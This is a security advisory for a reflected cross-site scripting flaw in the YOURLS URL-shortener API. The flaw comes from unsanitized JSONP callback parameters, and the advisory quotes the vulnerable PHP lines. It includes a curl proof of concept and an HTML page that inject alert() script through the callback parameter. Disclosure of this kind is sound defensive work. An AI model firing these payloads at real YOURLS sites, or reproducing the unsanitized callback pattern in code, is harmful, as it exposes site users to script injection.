GHSA-6mp4-q625-mxjp

Summary

The callback and jsonp request parameters are directly concatenated into the response without any sanitization that allowing attackers to inject arbitrary JS code. When YOURLS_PRIVATE is set to false (public API mode), this vulnerability can be exploited by any unauthenticated attacker. In private mode, the XSS payload is still injected into the 403 response body though browser execution is blocked.

Details

Vulnerability exists in the JSONP callback handling chain:

yourls-api.php:127-128

if( isset( $_REQUEST['callback'] ) )
    $return['callback'] = $_REQUEST['callback'];
elseif ( isset( $_REQUEST['jsonp'] ) )
    $return['callback'] = $_REQUEST['jsonp']; 

includes/functions-api.php:127-128

$callback = isset( $output['callback'] ) ? $output['callback'] : '';
$result =  $callback . '(' . json_encode( $output ) . ')';

PoC

I. YOURLS instance with YOURLS_PRIVATE set to false in config.php or user authenticated to a private YOURLS instance.

II. curl "http://localhost:8080/yourls-api.php?action=version&format=jsonp&callback=alert(document.domain)//" Expected response: alert(document.domain)//({"version":"1.10.2","callback":"alert(document.domain)\/\/"})

Browser PoC file:

<!DOCTYPE html>
<html>
<head><title>pwn</title></head>
<body>
<h1>pwn</h1>
<script src="http://localhost:8080/yourls-api.php?action=version&format=jsonp&callback=alert('pwn');//"></script>
</body>
</html>

Impact

Public Mode (YOURLSPRIVATE=false): Full exploitation, any unauthenticated user can trigger XSS. Private Mode (YOURLSPRIVATE=true): XSS payload is injected into 403 response body but browser blocks script execution. However, authenticated users or admins accessing malicious links are still vulnerable.